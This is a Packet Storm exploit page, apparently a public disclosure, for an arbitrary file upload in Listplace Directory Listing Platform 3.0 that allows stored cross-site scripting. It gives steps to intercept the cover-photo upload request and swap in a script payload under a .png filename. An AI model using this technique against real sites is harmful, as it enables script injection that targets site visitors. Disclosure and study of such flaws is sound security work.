exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Listplace Directory Listing Platform 3.0 File Upload / Cross Site Scripting

Listplace Directory Listing Platform 3.0 File Upload / Cross Site Scripting
Posted Jul 21, 2023
Authored by CraCkEr

Listplace Directory Listing Platform version 3.0 suffers from an arbitrary file upload vulnerability that can assist in cross site scripting attacks.

tags | exploit, arbitrary, xss, file upload
SHA-256 | 0a1cf13f5d7e602fbc48099e04b11e27f529f1a21a7180b11e2fec834efcc88b

Listplace Directory Listing Platform 3.0 File Upload / Cross Site Scripting

Change Mirror Download
# Exploit Title: Listplace Directory Listing Platform 3.0 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 12/07/2023
# Vendor: Bug Finder
# Vendor Homepage: https://bugfinder.net/
# Software Link: https://bugfinder.net/product/listplace-a-complete-directory-listing-platform/22
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server



## Description

Allows Attacker to upload malicious files onto the server, such as Stored XSS


## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard] go to [Profile Settings] on this Path: https://website/listplace/user/profile
3. Upload any Image to [User_Cover_Photo]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /listplace/user/coverPhotoUpdate HTTP/2

-----------------------------------------------------------
Content-Disposition: form-data; name="user_cover_photo"; filename="XSS.png"
Content-Type: image/png

<script>alert(1)</script>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploded Evil file on this Path: https://website/listplace/assets/uploads/users/[Stored-XSS]



[-] Done
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close